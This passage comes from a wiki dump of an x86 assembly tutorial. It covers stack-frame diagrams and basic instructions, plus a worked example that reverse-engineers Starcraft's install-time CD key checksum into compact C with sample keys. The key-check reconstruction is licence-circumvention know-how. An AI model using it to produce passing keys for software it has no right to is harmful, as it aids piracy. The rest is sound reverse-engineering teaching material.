<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401001 mov ebp, esp ; Set up the frame pointer.<br />
0x401002 sub esp, 8 ; Make room for two local variables.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 20</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 16</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 8, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center' style='color: red;'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401003 push esi ; Preserve esi on the stack.<br />
0x401004 push edi ; Preserve edi on the stack.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center' style='color: red;'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center' style='color: red;'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
Note how in the following section the variables are address based in the address of ebp. The first parameter is ebp + 8, which is 2 values above ebp on the stack, and the second is ebp + 12, which is 3 above ebp. Count them to confirm!<br />
<br />
0x401005 mov ecx, [ebp+8] ; Put the first parameter (a pointer) into ecx.<br />
0x401006 mov edx, [ebp+12] ; Put the second parameter (a pointer) into edx.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100' style='color: green;'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center' style='color: green;'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<br />
These lines don't use the stack, so the table will be omitted:<br />
0x401007 mov esi, [ecx] ; Dereference param1 to get the first value.<br />
0x401008 mov edi, [edx] ; Dereference param2 to get the second value.<br />
<br />
<br />
<br />
<br />
0x401009 mov [ebp-4], esi ; Store the first value as a local variable<br />
0x40100a mov [ebp-8], edi ; Store the second value as a local variable<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center' style='color: red;'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center' style='color: red;'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x40100b mov esi, [ebp-8] ; Retrieve them in reverse<br />
0x40100c mov edi, [ebp-4]<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center' style='color: green;'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center' style='color: green;'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<br />
0x40100d mov [ecx], edi ; Put the first value into the second address (param2 = param1)<br />
0x40100e mov [edx], esi ; Put the second value into the first address (param1 = param2)<br />
0x40100f pop edi ; Restore the edi register<br />
0x401010 pop esi ; Restore the esi register<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 20, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 16, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 8, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 4''</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan;'>'''''esp ''''', ''ebp - 8''</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 12''</td><br />
<td align='center' style='color: green;'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8, ''ebp - 16''</td><br />
<td align='center' style='color: green;'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401011 add esp, 8 ; Remove the local variables from the stack<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 12, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 4''</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8, ''ebp - 8''</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16, ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401012 pop ebp ; Restore ebp<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 8</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan;'>'''''esp '''''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center' style='color: green;'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
0x401013 ret ; Return (eax isn't set, so there's no return value)<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 4</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center' style='color: green;'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
0x400007 add esp, 8 ; Balance the stack<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp - 4</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 32</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 36</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
== Balance ==<br />
<br />
This should be rather obvious from the examples shown above, but it is worth paying special attention to.<br />
<br />
Every function should leave the stack pointer in the exact place it received it. In other words, every amount subtracted from the stack (either by sub or push) ''has to be added to the stack'' (either by add or pop). If it isn't, the return value won't be in the right place and the program will likely crash.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Example_1&diff=3141Example 12012-01-16T01:05:05Z<p>Killboy: /* Annotated Code */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
Welcome to the first assembly example! If you have read and understood all the sections up to here, there will not be any surprises. <br />
<br />
The code shown below verifies that a CDKey is valid to install the game with. If the CDKey fails to pass this check, the CDKey may not be used to install the game. Whether this succeeds or fails has no bearing on whether the CDKey is valid to log onto Battle.net with. <br />
<br />
The way one should approach this is to to do the following:<br />
# Copy all the assembly code to your IDE or somewhere safe. <br />
# Go through each line, and make a note of what it does (typically, putting a ; at the end and adding a comment works well). Try and understand what the code is doing. <br />
# Go through each line, and convert it to the equivalent C code (or Java, if you're more comfortable with that). <br />
# Try and combine and reduce the code to make it as simple as possible. <br />
<br />
I'll go through those steps here, hopefully to give an idea of how to approach a function such as this. I highly recommend you try it yourself first, though. <br />
<br />
== Code ==<br />
<pre><br />
; Note: ecx is a pointer to a 13-digit Starcraft cdkey<br />
; This is a function that returns 1 if it's a valid key, or 0 if it's invalid<br />
mov eax, 3<br />
mov esi, ecx<br />
xor ecx, ecx<br />
Top:<br />
movsx edx, byte ptr [ecx+esi]<br />
sub edx, 30h<br />
lea edi, [eax+eax]<br />
xor edx, edi<br />
add eax, edx<br />
inc ecx<br />
cmp ecx, 0Ch<br />
jl short Top<br />
<br />
xor edx, edx<br />
mov ecx, 0Ah<br />
div ecx<br />
<br />
movsx eax, byte ptr [esi+0Ch]<br />
add edx, 30h<br />
cmp eax, edx<br />
jnz bottom<br />
<br />
mov eax, 1<br />
ret<br />
<br />
bottom:<br />
xor eax, eax<br />
ret<br />
</pre><br />
<br />
== Annotated Code ==<br />
Please, try this yourself first! <br />
<br />
I've been over this code a dozen times, so I know it very well. I've tried to annotate it as clearly as possible. <br />
<br />
<pre><br />
; Note: ecx is a pointer to a 13-digit Starcraft cdkey<br />
; This is a function that returns 1 if it's a valid key, or 0 if it's invalid<br />
mov eax, 3 ; Set eax to 3<br />
mov esi, ecx ; Move the cdkey pointer to esi. It'll likely stay there, since esi is non-volatile<br />
xor ecx, ecx ; Clear ecx. Since a loop is coming up, this might be a loop counter<br />
Top:<br />
movsx edx, byte ptr [ecx+esi] ; ecx is a loop counter, and esi is the cdkey. This takes the ecx'th .<br />
; character (dereferenced, because of the square brackets [ ]) and moves<br />
; it into edx. Since it's a character array (string), there is no multiplier<br />
; for the array index. <br />
<br />
sub edx, 30h ; Subtract 0x30 from the character. This converts the ascii character '0', <br />
; '1', '2', etc. to the integer 0, 1, 2, etc.<br />
lea edi, [eax+eax] ; Double eax. This is likely an accumulator, which stores a result. <br />
xor edx, edi ; Xor the current digit by the current checksum.<br />
add eax, edx ; Add the value in eax back into the checksum.<br />
inc ecx ; Increment the loop counter, ecx.<br />
cmp ecx, 0Ch ; Compare the loop counter to 0x0c, or 12. <br />
jl short Top ; Go back to the top until the 12th character (note that the last character<br />
; is skipped<br />
<br />
xor edx, edx ; Clear edx<br />
mov ecx, 0Ah ; Set edx to 0x0a (10)<br />
div ecx ; Remember division? edx is cleared above, so this basically does eax / ecx<br />
; We don't know yet whether it will use the quotient (eax) or remainder (edx)<br />
<br />
movsx eax, byte ptr [esi+0Ch] ; Move the last character in the cdkey to eax. Note that this used move with <br />
; sign extension, which means the character is signed. Because it's an ascii <br />
; number (between 0x30 and 0x39), it'll never be negative so this doesn't<br />
; matter. <br />
add edx, 30h ; Convert edx (which is the remainder from the division -- the checksum % 10)<br />
; back to an ascii character. From the integer 0, 1, 2, etc. to the characters<br />
; '0', '1', '2', etc.<br />
<br />
cmp eax, edx ; Compare the last digit of the cdkey to the checksum result. <br />
jnz bottom ; If they aren't equal, jump to the bottom, which returns 0<br />
<br />
mov eax, 1 ; Return 1<br />
ret<br />
<br />
bottom:<br />
xor eax, eax ; Clear eax, and return 0<br />
ret<br />
</pre><br />
<br />
== C Code ==<br />
Please, try this yourself first! <br />
<br />
This is an absolutely direct conversion from the annotated assembly to C. I added a main function that sends a bunch of test keys through the function to print out the results. <br />
<br />
Now that a driver function can test the CDKey validator, the code can be reduced and condensed. <br />
<br />
<pre><br />
#include <stdio.h><br />
<br />
/* Prototype */<br />
int checkCDKey(char *key);<br />
<br />
int main(int argc, char *argv[])<br />
{<br />
/* A series of test cases (I'm using fake keys here obviously, but real ones work even better) */<br />
char *keys[] = { "1212121212121", /* Valid */<br />
"3781030596831", /* Invalid */<br />
"3748596030203", /* Invalid */<br />
"1234567890123", /* Valid */<br />
"4962883551538", /* Valid */<br />
"0000000000000", /* Invalid */<br />
"1111111111111", /* Invalid */<br />
"2222222222222", /* Invalid */<br />
"3333333333333", /* Valid */<br />
"4444444444444", /* Invalid */<br />
"5555555555555", /* Invalid */<br />
"6666666666666", /* Invalid */<br />
"7777777777777", /* Invalid */<br />
"8888888888888", /* Invalid */<br />
"9999999999999" /* Invalid */<br />
};<br />
int valid[] = { 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0 };<br />
int i;<br />
<br />
for(i = 0; i < 15; i++)<br />
printf("%s: %d == %d\n", keys[i], valid[i], checkCDKey(keys[i]));<br />
<br />
return 0;<br />
}<br />
<br />
int checkCDKey(char *key)<br />
{<br />
int eax, ebx, ecx, edx, edi;<br />
char *esi;<br />
<br />
// This is C code, written and tested on the gcc computer, under Linux. However, this should universally work. <br />
// ; Note: ecx is a pointer to a 13-digit Starcraft cdkey<br />
// ; This is a function that returns 1 if it's a valid key, or 0 if it's invalid<br />
// mov eax, 3 ; Set eax to 3<br />
eax = 3;<br />
// mov esi, ecx ; Move the cdkey pointer to esi. It'll likely stay there, since esi is non-volatile<br />
esi = key;<br />
// xor ecx, ecx ; Clear ecx. Since a loop is coming up, this might be a loop counter<br />
ecx = 0;<br />
// Top:<br />
do<br />
{<br />
// movsx edx, byte ptr [ecx+esi] ; ecx is a loop counter, and esi is the cdkey. This takes the ecx'th .<br />
// ; character (dereferenced, because of the square brackets [ ]) and moves<br />
// ; it into ecx. Since it's a character array (string), there is no multiplier<br />
// ; for the array index. <br />
edx = *(ecx + esi);<br />
//<br />
// sub edx, 30h ; Subtract 0x30 from the character. This converts the ascii character '0', <br />
// ; '1', '2', etc. to the integer 0, 1, 2, etc.<br />
edx = edx - 0x30;<br />
// lea edi, [eax+eax] ; Double eax. This is likely an accumulator, which stores a result. <br />
edi = eax + eax;<br />
// xor edx, edi ; Xor the current digit by the current checksum.<br />
edx = edx ^ edi;<br />
// add eax, edx ; Add the value in eax back into the checksum.<br />
eax = eax + edx;<br />
// inc ecx ; Increment the loop counter, ecx.<br />
ecx++;<br />
// cmp ecx, 0Ch ; Compare the loop counter to 0x0c, or 12. <br />
// jl short Top ; Go back to the top until the 12th character (note that the last character<br />
}<br />
while(ecx < 0x0c);<br />
// ; is skipped<br />
//<br />
// xor edx, edx ; Clear edx<br />
edx = 0;<br />
// mov ecx, 0Ah ; Set edx to 0x0a (10)<br />
ecx = 0x0a;<br />
// div ecx ; Remember division? edx is cleared above, so this basically does eax / ecx<br />
// ; We don't know yet whether it will use the quotient (eax) or remainder (edx)<br />
edx = eax % ecx;<br />
//<br />
// movsx eax, byte ptr [esi+0Ch] ; Move the last character in the cdkey to eax. Note that this used move with <br />
// ; sign extension, which means the character is signed. Because it's an ascii <br />
// ; number (between 0x30 and 0x39), it'll never be negative so this doesn't<br />
// ; matter. <br />
eax = *(esi + 0x0c);<br />
// add edx, 30h ; Convert edx (which is the remainder from the division -- the checksum % 10)<br />
// ; back to an ascii character. From the integer 0, 1, 2, etc. to the characters<br />
// ; '0', '1', '2', etc.<br />
edx = edx + 0x30;<br />
//<br />
// cmp eax, edx ; Compare the last digit of the cdkey to the checksum result. <br />
if(eax == edx)<br />
{<br />
// jnz bottom ; If they aren't equal, jump to the bottom, which returns 0<br />
//<br />
// mov eax, 1 ; Return 1<br />
// ret<br />
return 1;<br />
}<br />
else<br />
{<br />
//<br />
// bottom:<br />
// xor eax, eax ; Clear eax, and return 0<br />
// ret<br />
return 0;<br />
}<br />
}<br />
</pre><br />
<br />
Here is the output:<br />
<pre><br />
1212121212121: 1 == 1<br />
3781030596831: 0 == 0<br />
3748596030203: 0 == 0<br />
1234567890123: 1 == 1<br />
4962883551538: 1 == 1<br />
0000000000000: 0 == 0<br />
1111111111111: 0 == 0<br />
2222222222222: 0 == 0<br />
3333333333333: 1 == 1<br />
4444444444444: 0 == 0<br />
5555555555555: 0 == 0<br />
6666666666666: 0 == 0<br />
7777777777777: 0 == 0<br />
8888888888888: 0 == 0<br />
9999999999999: 0 == 0<br />
</pre><br />
<br />
== Cleaned up C Code == <br />
Here's the same code with the assembly removed and some minor cleanups. After every change, the program should be run again to ensure that the code still works as expected. The driver function is unchanged, so here's the cleaned up C function:<br />
<br />
<pre><br />
int checkCDKey(char *key)<br />
{ <br />
int eax, ebx, ecx, edx, edi; <br />
char *esi;<br />
<br />
eax = 3;<br />
esi = key;<br />
ecx = 0;<br />
<br />
do<br />
{<br />
edx = *(ecx + esi);<br />
edx = edx - 0x30;<br />
edi = eax + eax;<br />
edx = edx ^ edi;<br />
eax = eax + edx;<br />
ecx++;<br />
}<br />
while(ecx < 0x0c);<br />
<br />
edx = 0;<br />
ecx = 0x0a;<br />
edx = eax % ecx;<br />
eax = *(esi + 0x0c);<br />
edx = edx + 0x30;<br />
if(eax == edx)<br />
return 1;<br />
else<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Reduced C Code ==<br />
In this section the code will be reduced and cleaned up to be as friendly as possible. Technically, the above function can be left the way it is, but it's a good exercise to learn. <br />
<br />
First, the variables are renamed, unused variables are removed, and the return is condensed:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp, temp2; <br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
do<br />
{<br />
temp = *(i + key);<br />
temp = temp - 0x30;<br />
temp2 = accum + accum;<br />
temp = temp ^ temp2;<br />
accum = accum + temp;<br />
i++;<br />
}<br />
while(i < 0x0c);<br />
<br />
temp = 0;<br />
i = 0x0a;<br />
temp = accum % i;<br />
accum = *(key + 0x0c);<br />
temp = temp + 0x30;<br />
<br />
return accum == temp;<br />
}<br />
</pre><br />
<br />
Replace the pointers with array indexing, which looks a lot nicer:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp, temp2; <br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
do<br />
{<br />
temp = key[i];<br />
temp = temp - 0x30;<br />
temp2 = accum + accum;<br />
temp = temp ^ temp2;<br />
accum = accum + temp;<br />
i++;<br />
}<br />
while(i < 0x0c);<br />
<br />
temp = 0;<br />
i = 0x0a;<br />
temp = accum % i;<br />
accum = key[12];<br />
temp = temp + 0x30;<br />
<br />
return accum == temp;<br />
}<br />
</pre><br />
<br />
Substitute some variables with their values:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp, temp2; <br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
do<br />
{<br />
temp = key[i] - 0x30;<br />
temp = temp ^ (accum + accum);<br />
accum = accum + temp;<br />
i++;<br />
}<br />
while(i < 0x0c);<br />
<br />
temp = (accum % 10) + 0x30;<br />
accum = key[12];<br />
<br />
return accum == temp;<br />
}<br />
</pre><br />
<br />
Substitute some more variables, and replace the do..while loop with a for loop:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp;<br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
for(i = 0; i < 12; i++)<br />
{<br />
temp = (key[i] - 0x30) ^ (accum + accum);<br />
accum = accum + temp;<br />
}<br />
<br />
<br />
return key[12] == ((accum % 10) + 0x30);<br />
}<br />
</pre><br />
<br />
== Finished Code ==<br />
And finally, substitute the last of the variables:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
<br />
for(i = 0; i < 12; i++)<br />
accum += (key[i] - 0x30) ^ (accum + accum);<br />
<br />
return key[12] == ((accum % 10) + 0x30);<br />
}<br />
</pre><br />
<br />
That's as reduced as it gets. And running it through the driver function still works. <br />
<br />
That's all for example 1, the next example will demonstrate the way in which the Starcraft CDKey is shuffled before it is encoded.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Simple_Instructions&diff=3140Simple Instructions2012-01-16T01:01:55Z<p>Killboy: /* cmp, test */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section will go over some basic assembly instructions that you will likely see frequently. Some of the functions shown here are tricky, and some have special properties (such as the registers they use). Additionally, x86 assembly is comprised of hundreds of different instructions. As a result, you will likely want to find a complete reference book or website to have alongside you. This page however, will give enough of an introduction to get you started. <br />
<br />
== Pointers and Dereferencing==<br />
First, we will start with the hard stuff. If you understood the pointers section, this shouldn't be too bad. If you didn't, you should probably go back and refresh your memory. <br />
<br />
Recall that a pointer is a data type that stores an address as its value. Since registers are simply 32-bit values with no actual types, any register may or may not be a pointer, depending on what is stored. It is the responsibility of the program to treat pointers as pointers and to treat non-pointers as non-pointers. <br />
<br />
If a value is a pointer, it can be dereferenced. Recall that dereferencing a pointer retrieves the value stored at the address being pointed to. In assembly, this is generally done by putting square brackets ("[" and "]") around the register. For example:<br />
* eax -- is the value stored in eax<br />
* [eax] -- is the value pointed to by eax<br />
This will be thoroughly discussed in upcoming sections.<br />
<br />
== Doing Nothing ==<br />
The ''nop'' instruction is probably the simplest instruction in assembly. nop is short for "no operation" and it does nothing. This instruction is used for padding. <br />
<br />
== Moving Data Around ==<br />
The instructions in this section deal with relocating numbers and pointers. <br />
<br />
=== mov, movsx, movzx ===<br />
''mov'' is the instruction used for assignment, analogous to the "=" sign in most languages. mov can move data between a register and memory, two registers, or a constant to a register. Here are some examples:<br />
mov eax, 1 ; set eax to 1 (eax = 1)<br />
mov edx, ecx ; set edx to whatever ecx is (edx = ecx)<br />
mov eax, 18h ; set eax to 0x18<br />
mov eax, [ebx] ; set eax to the value in memory that ebx is pointing at<br />
mov [ebx], 3 ; move the number 3 into the memory address that ebx is pointing at<br />
<br />
''movsx'' and ''movzx'' are special versions of mov which are designed to be used between signed (movsx) and unsigned (movzx) registers of different sizes. <br />
<br />
''movsx'' means ''move with sign extension''. The data is moved from a smaller register into a bigger register, and the sign is preserved by either padding with 0's (for positive values) or F's (for negative values). Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000''', since it was positive<br />
* '''0x7FFF''' becomes '''0x00007FFF''', since it was positive<br />
* '''0xFFFF''' becomes '''0xFFFFFFFF''', since it was negative (note that 0xFFFF is -1 in 16-bit signed, and 0xFFFFFFFF is -1 in 32-bit signed)<br />
* '''0x8000''' becomes '''0xFFFF8000''', since it was negative (note that 0x8000 is -32768 in 16-bit signed, and 0xFFFF8000 is -32768 in 32-bit signed)<br />
<br />
''movzx'' means ''move with zero extension''. The data is moved from a smaller register into a bigger register, and the sign is ignored. Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000'''<br />
* '''0x7FFF''' becomes '''0x00007FFF'''<br />
* '''0xFFFF''' becomes '''0x0000FFFF'''<br />
* '''0x8000''' becomes '''0x00008000'''<br />
<br />
=== lea ===<br />
''lea'' is very similar to mov, except that math can be done on the original value before it is used. The "[" and "]" characters always surround the second parameter, but in this case they ''do not indicate dereferencing'', it is easiest to think of them as just being part of the formula. <br />
<br />
lea is generally used for calculating array offsets, since the address of an element of the array can be found with [arraystart + offset*datasize]. lea can also be used for quickly doing math, often with an addition and a multiplication. Examples of both uses are below. <br />
<br />
Here are some examples of using lea:<br />
lea eax, [eax+eax] ; Double the value of eax -- eax = eax * 2<br />
lea edi, [esi+0Bh] ; Add 11 to esi and store the result in edi<br />
lea eax, [esi+ecx*4] ; This is generally used for indexing an array of integers. esi is a <br />
pointer to the beginning of an array, and ecx is the index of the <br />
element that is to be retrieved. The index is multiplied by 4 <br />
